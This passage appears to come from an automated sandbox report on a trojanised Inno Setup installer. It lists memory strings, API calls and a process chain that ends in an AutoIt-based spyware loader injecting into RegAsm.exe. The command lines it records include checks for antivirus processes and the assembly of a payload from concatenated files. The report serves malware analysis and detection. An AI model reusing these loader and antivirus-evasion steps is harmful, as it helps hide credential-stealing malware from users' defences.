                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.000000000289D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.000000000289D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                    Source: Setup.exe, 00000002.00000003.1761393859.00000000022D6000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1755405797.0000000002586000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autodesk.com/
                    Source: Setup.exe, 00000002.00000003.1652253190.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1664466450.00000000034B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autodesk.com/0http://www.autodesk.com/0http://www.autodesk.com/
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
                    Source: MmReveals.exe, 00000003.00000003.1675095566.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000000.1699641380.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp, Eco.pif.5.dr, Glasses.3.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Setup.exe, 00000002.00000003.1652253190.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1761393859.000000000227D000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1664466450.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1755405797.00000000024DD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
                    Source: Eco.pif, 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, is-RI2MT.tmp.1.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: https://www.globalsign.com/repository/03
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000000.1636308762.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Setup.exe, 00000002.00000003.1657177006.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1654004225.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000000.1660124095.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Setup.tmp.2.dr, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.drString found in binary or memory: https://www.innosetup.com/
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000000.1636308762.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Setup.exe, 00000002.00000003.1657177006.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1654004225.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000000.1660124095.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Setup.tmp.2.dr, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00584614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_00584614
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00584416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_00584416
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0059CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,14_2_0059CEDF
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00530D68 FindCloseChangeNotification,NtResumeThread,14_2_00530D68
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005740C1: CreateFileW,DeviceIoControl,CloseHandle,14_2_005740C1
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00568D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00568D11
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,3_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005755E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_005755E5
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_0040497C3_2_0040497C
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_00406ED23_2_00406ED2
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004074BB3_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0051B02014_2_0051B020
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005194E014_2_005194E0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00519C8014_2_00519C80
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005981C814_2_005981C8
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053232514_2_00532325
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0054643214_2_00546432
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0054258E14_2_0054258E
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0051E6F014_2_0051E6F0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053275A14_2_0053275A
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0059080214_2_00590802
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005488EF14_2_005488EF
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005469A414_2_005469A4
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00520BE014_2_00520BE0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0056EB9514_2_0056EB95
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00590C7F14_2_00590C7F
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053CC8114_2_0053CC81
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00578CB114_2_00578CB1
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00546F1614_2_00546F16
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005332E914_2_005332E9
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053F33914_2_0053F339
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0052D45714_2_0052D457
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0052F57E14_2_0052F57E
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005315E414_2_005315E4
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0051166314_2_00511663
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0051F6A014_2_0051F6A0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005377F314_2_005377F3
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053DAD514_2_0053DAD5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00531AD814_2_00531AD8
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00549C1514_2_00549C15
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0052DD1414_2_0052DD14
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00531EF014_2_00531EF0
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0053BF0614_2_0053BF06
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeCode function: 20_2_00D5DC7420_2_00D5DC74
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: String function: 00521A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: String function: 00538A60 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: String function: 00530C42 appears 70 times
                    Source: C:\StrLocalGate\MmReveals.exeCode function: String function: 004062A3 appears 57 times
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Setup.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1668432847.0000000002358000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000027DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FE36000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000000.1630689613.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeBinary or memory string: OriginalFileName vs be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: is-RISCU.tmp.1.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                    Source: classification engineClassification label: mal72.troj.spyw.evad.winEXE@34/46@1/1
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0057A51A GetLastError,FormatMessageW,14_2_0057A51A
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00568BCC AdjustTokenPrivileges,CloseHandle,14_2_00568BCC
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_0056917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_0056917C
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_00573FB5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,14_2_00573FB5
                    Source: C:\StrLocalGate\MmReveals.exeCode function: 3_2_004024FB CoCreateInstance,3_2_004024FB
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005742AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,14_2_005742AA
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\Program Files (x86)\StrLocalGateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeFile created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmpJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\StrLocalGate\MmReveals.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeReversingLabs: Detection: 36%
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeFile read: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe "C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp "C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess created: C:\Program Files (x86)\StrLocalGate\Setup.exe "C:\Program Files (x86)\StrLocalGate\Setup.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmpProcess created: C:\StrLocalGate\MmReveals.exe "C:\StrLocalGate\MmReveals.exe"
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp "C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe"
                    Source: C:\StrLocalGate\MmReveals.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 154571
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TRUEANALOGMINDOC" Pepper
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Lt + Blake + Tranny + Category 154571\i
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif 154571\Eco.pif 154571\i
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifProcess created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
